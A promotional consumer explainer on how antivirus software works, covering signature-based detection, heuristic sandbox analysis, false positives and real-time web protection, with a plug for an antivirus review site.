Antivirus is the major line of defense between your computer and malware infections. Most people typically allow antivirus to run quietly in the background, automatically self-update if required, and perform scheduled scans. That is all fine and well. However, you can get far more from your antivirus protection by understanding how it really works. There is certainly nothing wrong with normally permitting antivirus software to do its own thing. However, when you understand the hows and whys of the antivirus software works, you will have the ability to fine-tune the settings better to your specific needs.
You’ll also have the ability to find out if there are particular functions or characteristics of antivirus software you do not actually need. While lots of people can be tempted to subscribe to the highest tier program an antivirus software provides, or maybe just go for the most elementary protection available, you will have the ability to narrow down your choices a lot better after you have an understanding of what specific features really do for you.
As soon as you’re more familiar with basic antivirus functions, you can more easily follow along with some of the antivirus reviews at AV-Best, which contrasts some of the most popular antivirus products and what they provide the consumer. With all that said, let’s get into how antivirus software really works. There are two chief methods antivirus software uses to protect the user from malware.
- Signature-based detection
- Heuristic analysis
We’ll explore these two deeper, but the gist is, signature-based detection scans files for known threats. It is just like a trespass ban list in a theme park, where specific names of individuals are listed for denial of entry. Heuristic analysis scans records for known virus behaviour.
Going on the theme park analogy, heuristic analysis is similar to looking for people on the prohibited list, even if they are wearing a fake mustache and glasses. Those are vast simplifications of signature-based detection and heuristic analysis, merely to give you a simple idea, so now we will jump right into describing them in more expansive terms.
What’s signature-based detection?
As we mentioned, signature-based detection compares files from the antivirus program’s registry database. If a match is found, then the files will instantly be quarantined (in many cases — it is dependent upon your application settings). Of course, it is not really the “documents” being scanned on the antivirus database.
It’s nothing like the antivirus database is a significant list of filenames so that anything called “BigScaryVirus.exe” is automatically quarantined. What the signature-based detection is in fact searching for is code that a document tries to execute. Because viruses are just strings of code (instructions) delivered to the computer, the antivirus software attempts to ascertain what actions a document executes when it’s launched.
This can range from items like trying to run administrative commands in the background, to calling known malicious web servers and attempting to run scripts to install unwanted programs.
What’s heuristic analysis?
As we mentioned earlier in this guide, if signature-based detection is the banned list in a theme park, heuristic evaluation is discovering the prohibited people who try to sneak in wearing a fake mustache. This actually works in antivirus software is that, when a document is scanned, it may not include any “known” virus code routines.
It’s not an immediately recognizable threat. But, it may contain suspicious code patterns, like a script which tries to change critical Windows files, in average virus style. Heuristic analysis thus opens the document in a sandbox situation, to find out what could happen if it really allowed the program to operate.
Because the program isn’t permitted to escape the digital sandbox, any possibly malicious code isn’t allowed to really run on the machine itself. Aside from the sandbox, a newer approach to heuristic investigation uses machine learning and data mining. In this procedure, algorithms can be applied to classify the behavior of a document, by extracting certain file attributes from the document itself.
Configuring antivirus security is tricky business
While we are making the procedure sound rather simple, antivirus software developers must really take particular care to balance the sensitivity of the heuristic analysis. When it’s too weak, it will definitely let viruses pass. But if it is too strong, it is going to raise false positives on documents that don’t actually contain any viruses.
Some companies take the approach of stronger security is better, and thus some antivirus software could have a propensity to give more false positives. Other businesses don’t want to bother the user and might have more relaxed security settings. It’s truly a challenging balancing act.
As a particular example, imagine you download a program for entirely altering the look of the Windows Start menu. This program permits you to add custom images to the Windows GUI, creating an entirely unique user experience. Now, because this application will change and change Windows system files, some antivirus software will really detect it as a threat, and possibly quarantine (or automatically delete) the app.
I personally use one such program, for changing my whole Windows system using a black theme. As we said, it is hard for antivirus software developers to fine-tune and balance their heuristic evaluation, without inconveniencing the user and providing a lot of false positives. Of course, the user can always manually correct the general security settings of the antivirus software, and add certain files and folders into the antivirus software’s whitelist, so the antivirus will completely ignore those folders and files.
Real-time and Web Protection
While conventional malware typically came from infected documents that a user intentionally downloaded, like an infected email attachment, the net has evolved beyond that. In today’s age, a user may get infected in many diverse manners. Adding an infected flash drive in your computer is a frequent manner, as malware can automatically detect when flash drives are plugged into the computer, and replicate itself between drives.
Users may also become infected by simply surfing the net without adequate real-time security. Cybercriminals have become sophisticated enough to embed malicious scripts in site code, and even banner ads, which may take advantage of security holes in the user’s browser program. 2016 saw the growth of crypto-miner scripts, where only visiting a site hosting one of those scripts could hijack your CPU power for mining cryptocurrency.